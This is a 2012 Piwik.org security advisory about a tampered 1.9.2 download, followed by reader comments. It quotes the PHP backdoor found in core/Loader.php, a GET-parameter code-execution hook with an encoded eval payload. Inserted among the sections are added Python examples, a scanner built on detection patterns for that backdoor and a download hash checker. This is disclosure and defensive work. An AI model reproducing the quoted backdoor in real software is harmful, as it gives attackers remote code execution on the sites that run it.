Posted 27 November 2012 in Community, Security (22 comments)

Security Report: Piwik.org webserver hacked for a few hours on 2012 Nov 26th

Important Security Announcement: the Piwik.org webserver was compromised by an attacker on 2012 Nov 26th. The attacker added malicious code to the Piwik 1.9.2 Zip file, which was served for a few hours.

How do I know if my Piwik server is safe?

You would be at risk only if you installed or updated to Piwik 1.9.2 on Nov 26th from 15:43 UTC to 23:59 UTC.
If you are not using 1.9.2, or if you have updated to 1.9.2 earlier than Nov 26th 15:40 UTC or from Nov 27th, you should be safe.

How do I double check if my Piwik server is affected?

To check whether your Piwik is affected, open the file piwik/core/Loader.php. A clean file looks like this, whereas a compromised Loader.php contains the following code at the end of the file:

<?php Error_Reporting(0);
if(isset($_GET['g']) && isset($_GET['s'])) {
    preg_replace("/(.+)/e", $_GET['g'], 'dwm');
    exit;
}
if (file_exists(dirname(__FILE__)."/lic.log")) exit;
eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/OhLWNOVrF/IlKatiIlnbIOZ/bpzb2pAyXRl7uF/s7JuffmMlrf3y7XD09OSWbUo9RzF6XzHCz3+0pOeDW0C79s2vqtaSdOTRKZOxfXDlmJOvp8LbzHwJle/aIYEL0YWE$

If you see this malicious code in your piwik/core/Loader.php file, read below to fix this issue.
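The manual check above looks at one file by eye. The script below is an added example (not Piwik project code) that automates it: it walks a Piwik tree and reports every PHP file containing the indicators visible in the snippet above (the `$_GET['g']`/`$_GET['s']` gate, `preg_replace` with the `/e` modifier, the `lic.log` kill-switch check, and `eval(gzuncompress(base64_decode(...)))`). It goes beyond the advisory in scanning every `.php` file rather than only `core/Loader.php`, since the recommended fix deletes the whole directory. The sample tree it builds, the `Piwik_Loader` stub and the placeholder in place of the base64 blob are all constructed for the demonstration.

```python
"""Scan a Piwik tree for the Loader.php backdoor indicators quoted in the advisory.

Added example, not Piwik project code. The indicator patterns come from the
snippet in the advisory; the sample files are constructed for demonstration.
"""
import os
import re
import tempfile

# One regex per indicator taken from the malicious snippet, with a report label.
INDICATORS = {
    "get_g_s_gate": re.compile(
        r"isset\(\s*\$_GET\['g'\]\s*\)\s*&&\s*isset\(\s*\$_GET\['s'\]\s*\)"),
    # preg_replace with the (removed in PHP 7) /e modifier evaluates the replacement.
    "preg_replace_e_modifier": re.compile(
        r"preg_replace\s*\(\s*[\"']/.*?/[A-Za-z]*e[A-Za-z]*[\"']"),
    "lic_log_killswitch": re.compile(r"file_exists\(.*?lic\.log"),
    "eval_gzuncompress_base64": re.compile(
        r"eval\s*\(\s*gzuncompress\s*\(\s*base64_decode\s*\("),
}


def scan_file(path):
    """Return the sorted labels of every indicator found in one file."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def scan_tree(root, extensions=(".php",)):
    """Walk root and return {relative_path: [labels]} for every file with a hit.

    The advisory names only core/Loader.php, but the fix deletes the whole
    tree, so every PHP file is checked. Paths use '/' regardless of platform.
    """
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(extensions):
                continue
            full = os.path.join(dirpath, name)
            hits = scan_file(full)
            if hits:
                findings[os.path.relpath(full, root).replace(os.sep, "/")] = hits
    return findings


# Constructed stand-in for a clean core/Loader.php (the real file is much longer).
CLEAN_LOADER = "<?php\n// constructed stand-in for a clean core/Loader.php\nclass Piwik_Loader { }\n"

# Constructed stand-in for the appended backdoor: same shape as the advisory's
# snippet, with the base64 blob replaced by a placeholder that decodes to nothing useful.
BACKDOOR_TAIL = (
    "<?php Error_Reporting(0); if(isset($_GET['g']) && isset($_GET['s'])) {\n"
    "preg_replace(\"/(.+)/e\", $_GET['g'], 'dwm'); exit;\n}\n"
    "if (file_exists(dirname(__FILE__).\"/lic.log\")) exit;\n"
    "eval(gzuncompress(base64_decode('CONSTRUCTED_PLACEHOLDER_NOT_A_REAL_PAYLOAD')));\n"
)


def build_sample_tree():
    """Create a temp dir with one clean and one compromised Loader.php; return its path."""
    root = tempfile.mkdtemp(prefix="piwik-scan-")
    clean = os.path.join(root, "clean", "core")
    bad = os.path.join(root, "compromised", "core")
    os.makedirs(clean)
    os.makedirs(bad)
    with open(os.path.join(clean, "Loader.php"), "w", encoding="utf-8") as fh:
        fh.write(CLEAN_LOADER)
    with open(os.path.join(bad, "Loader.php"), "w", encoding="utf-8") as fh:
        fh.write(CLEAN_LOADER + BACKDOOR_TAIL)
    return root


def demo():
    """Scan the constructed tree; only the compromised copy should be reported."""
    return scan_tree(build_sample_tree())


if __name__ == "__main__":
    for path, hits in demo().items():
        print(f"{path}: {', '.join(hits)}")
```

To check a real installation, call `scan_tree("/path/to/piwik")` instead of `demo()`. A hit on any file, not only Loader.php, is a reason to follow the full reinstall procedure rather than to clean the one file; a clean scan only shows that this particular payload is absent.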

How do I fix my Piwik if it is compromised?
If your Piwik is compromised, follow these steps:

  1. Backup piwik/config/config.ini.php
  2. DELETE the piwik/ directory
    It is important to DELETE the directory and all piwik files, to ensure any malicious script is deleted as well.
  3. Download latest Piwik from piwik.org
  4. Unzip and upload the piwik/ directory on your server
  5. Copy the config.ini.php back in /piwik/config/
  6. Go to Piwik, it should display the dashboard as expected

You have now successfully restored Piwik to a clean version.

If you have other web software running in the same path on your server, we recommend, to be safe, restoring a backup of that software as well.

How did the attacker get into piwik.org?

The attacker used a security issue in a WordPress plugin we were using, and gained partial access to the piwik.org server.

Is there a security bug in Piwik software itself?

The website Piwik.org runs WordPress and was compromised because of a security issue in a WordPress plugin. As far as we know, the Piwik software itself does not have any exploitable security issue. We have a security bug bounty program in place that rewards researchers for finding security issues in Piwik software and disclosing them to us. We also document here how you can make your own Piwik data safer and secure your server.

Has any sensitive data been leaked?

Piwik is a self-hosted, open source software. Piwik.org does not track any web analytics data from any Piwik user. No personal or sensitive data has been leaked since we do not track any.

What we are doing to prevent further issues

We are still working with our system administrators on the issue and have some ideas to make this kind of problem much less likely to occur. We will post a follow-up once these new mechanisms are in place.

Summary

We would like to thank the Piwik users who quickly reported this problem (by email and in the forums). We received more than five reports in a two-hour timeframe, which shows that the Piwik community is very vigilant and ready to react to any problem.

We are truly sorry for the inconvenience. Please be assured that we will do our best to keep Piwik (and Piwik.org) a safe place in the future.

Contact us at security@piwik.org if you need more info.

About author
piwik team member

Piwik team

Piwik philosophy: «To create, through a community, an advanced international open-source web analytics platform that gives every user full control over their own data.»

If you can, please donate now for the future of Piwik, or sponsor a new feature that is useful to you through the crowdfunding platform.


  1. Web Server Says:

    January 9, 2013 11:32 am

    This is very dangerous; nowadays I am hearing so much news like this about hacking, and the hackers are doing a really fantastic job, sorry to say. Our servers are not so safe any more when the hackers hack government sites too.

  2. Jimmy Says:

    December 20, 2012 2:14 am

    This is bad news.. where are the attacks from? ..updating the last Piwik..

  3. Niklas Says:

    December 15, 2012 11:43 am

    Would you please, please, disclose the plugin that was the cause of the breach?

  4. Nicole Says:

    December 3, 2012 6:42 pm

    Please disclose the goal or changes that would have been made by the hacked version of your software so that those affected can check those areas rather than simply saying, re-install everything else in your path on your server. For some that is quite a large task.

  5. Piwik team Says:

    December 1, 2012 2:51 pm

    We will not disclose more information regarding the attack, since the problem was fixed in the plugin. Our general recommendation is to update all WordPress plugins to their latest versions.

    We will move the ZIP to a new server and architecture to prevent this from happening again. Stay tuned on the blog for an announcement when this is in place.

  6. Investorenfinden Says:

    December 1, 2012 7:27 am

    I think the plugin should be deleted very quickly. Then everything should be back in the green zone.

  7. Benjamin Says:

    November 30, 2012 9:35 am

    Besides other security measures please consider to move the published code to a completely different server. This would have easily prevented the hack.
    A code repository does not belong on the same server as a webpage with wordpress + plugins.

  8. Chris Says:

    November 30, 2012 5:03 am

    Yes please disclose the plugin. It is the responsible thing to do to prevent others from being hacked. If it was downloaded from wordpress.org and you disclose it will be removed from the repository and users who previously downloaded it will be notified of the vulnerability.

  9. Sascha Says:

    November 29, 2012 8:38 am

    Disclose the WP-Plugin………………………………………………………

  10. Piwik team Says:

    November 28, 2012 12:28 pm

    > Well, how is it then that I suddenly received a “Piwik newsletter” in October, although I NEVER signed up for Piwik mails

    Well certainly, if you got a Piwik newsletter, it is because you signed up during the Piwik installation process. Maybe you didn’t notice during the installation, but for sure, you did sign up!

    >PGP, SSL, SHA1 checksum…

    we are thinking about these ideas and more, and will update in the Blog once we have implemented them.

    > Was it just the zip file or did that guy also hit the subversion repository? For simplicity I did pull stuff from there…
    It was just the ZIP file, the SVN repo was not affected.

  11. Scott W Says:

    November 28, 2012 12:05 pm

    LOL, Check out the demo site, amazing what news of a minor intrusion will do for your pageview stats. Also notice the crickets chirping from the vendor side of the comments… Come on Piwik, are you gonna leave us hanging? Or address these very valid questions?

  12. Stargazer Says:

    November 28, 2012 7:22 am

    Was it just the zip file or did that guy also hit the subversion repository? For simplicity I did pull stuff from there…

  13. Alexander Schestag Says:

    November 28, 2012 6:35 am

    I agree with Max and Gerald. Please, disclose the WordPress plugin that caused the issue to prevent others having the same issue. And I also agree with the other proposals for securing the download. https is an absolute must as well as PGP.

  14. Christian Jensen Says:

    November 27, 2012 8:04 pm

    What does the exploit do exactly? I could run it but I am not sure what the side effects would be.

  15. Max Says:

    November 27, 2012 7:10 pm

    I too would be interested to know which WordPress plugin caused the security issue. This would be helpful information to prevent other sites from being hacked.

  16. Nicolas Kuttler Says:

    November 27, 2012 5:29 pm

    Oh, I would also be interested in the malicious payload itself. The snippet you pasted is incomplete.

  17. Amit Shah Says:

    November 27, 2012 4:44 pm

    Please use SSL for download links and PGP/GPG-sign binaries, hash information. That will take care of the major issues.

    And in-place upgrades (directly from the installation) should be discouraged / disallowed to ensure they don’t get an infected version

  18. Quist Says:

    November 27, 2012 4:31 pm

    The copy I retrieved at Nov 26 21:32 seems ok. Perhaps the time span was shorter? Or maybe I got it through a mirror/cache at the ISP?

    latest.zip?cb=1.9.2

    6850442 bytes

    Sha1: b7f7be56d733d9ff1529d271f4b1f0c3b9913090

  19. Jonas Says:

    November 27, 2012 3:44 pm

    I don’t think a PGP signature is too much to ask. Pretty much all other open source software is signed that way.

  20. Ben Says:

    November 27, 2012 2:42 pm

    You might want to consider to display the sha1 hash of the latest.zip below the download box.
    Additionally the automatic updater should display the current sha1 hash that it downloaded and ask the user to verify the hash with the one on the website.

    Of course an attacker would be able to change the displayed hash below the download box, but it is one more step to do and it is easier for the development team to see if something has changed.
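Several commenters above (Quist's size and SHA-1 for latest.zip, Ben's proposal that the updater compare a downloaded hash against the published one) describe the same integrity check. The block below is an added example, not Piwik's updater or project code, showing what that check looks like: compare size, compare the digest in constant time, and confirm the archive is a readable ZIP. The archive, the published values and the tampered copy are all constructed here; `demo()` also reproduces Ben's caveat, that a digest published on the same host as the download passes when the attacker can rewrite both.

```python
"""Verify a downloaded archive against a published size and digest.

Added example, not Piwik project code. The expected values are computed
from a constructed archive, not from Piwik's real release.
"""
import hashlib
import hmac
import io
import zipfile


def digest_of(data, algorithm="sha1"):
    """Hex digest of a byte string. SHA-1 matches the comments; SHA-256 is preferable today."""
    return hashlib.new(algorithm, data).hexdigest()


def verify_download(data, expected_size, expected_digest, algorithm="sha1"):
    """Return (ok, reason): size check, constant-time digest check, then ZIP integrity."""
    if len(data) != expected_size:
        return False, f"size mismatch: got {len(data)}, expected {expected_size}"
    actual = digest_of(data, algorithm)
    # compare_digest avoids leaking how many leading hex chars matched.
    if not hmac.compare_digest(actual, expected_digest.lower()):
        return False, f"{algorithm} mismatch: got {actual}"
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            bad_member = zf.testzip()  # CRC check of every member, None if all pass
    except zipfile.BadZipFile as exc:
        return False, f"not a valid zip: {exc}"
    if bad_member is not None:
        return False, f"corrupt member in archive: {bad_member}"
    return True, "ok"


def build_release():
    """Constructed stand-in for latest.zip containing a tiny piwik/ tree."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("piwik/index.php", "<?php // constructed\n")
        zf.writestr("piwik/core/Loader.php", "<?php class Piwik_Loader { }\n")
    return buf.getvalue()


def demo():
    """Publish size+digest for the genuine archive, then check genuine and tampered copies."""
    genuine = build_release()
    published_size, published_sha1 = len(genuine), digest_of(genuine)
    # Constructed tampered copy: bytes appended after the ZIP, as an attacker might.
    tampered = genuine + b"\n<?php /* appended (constructed) */\n"
    return {
        "genuine": verify_download(genuine, published_size, published_sha1),
        # Caught by the size check before the digest is even computed.
        "tampered_size": verify_download(tampered, published_size, published_sha1),
        # Size passed through: the digest comparison catches it instead.
        "tampered_digest": verify_download(tampered, len(tampered), published_sha1),
        # Ben's caveat: if the attacker rewrote the published values too, the
        # check passes. Only a signature with a key held off the web host
        # (the PGP proposal in the thread) closes this gap.
        "digest_from_same_host": verify_download(tampered, len(tampered), digest_of(tampered)),
    }


if __name__ == "__main__":
    for case, (ok, reason) in demo().items():
        print(f"{case:22} ok={ok} ({reason})")
```

In an updater this would run on the downloaded bytes before anything is unzipped into the web root, with the expected values fetched from a source the download host cannot rewrite.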

  21. user Says:

    November 27, 2012 1:40 pm

    > No personal or sensitive data has been leaked since we do not track any.

    Well, how is it then that I suddenly received a “Piwik newsletter” in October, although I NEVER signed up for Piwik mails and run a Piwik installation for quite a while now? When and how had my mail address been transferred to the Piwik server? The following statement in that mail is clearly wrong and reminds me of unsolicited bulk email of another kind:

    > You are receiving this newsletter because you have signed up during the Piwik installation to
    receive Piwik emails.

    So, no Piwik auto-updates any more here.

  22. Gerald Says:

    November 27, 2012 12:48 pm

    Would you mind disclosing what WordPress plugin was affected? This could prevent other sites from being hacked.
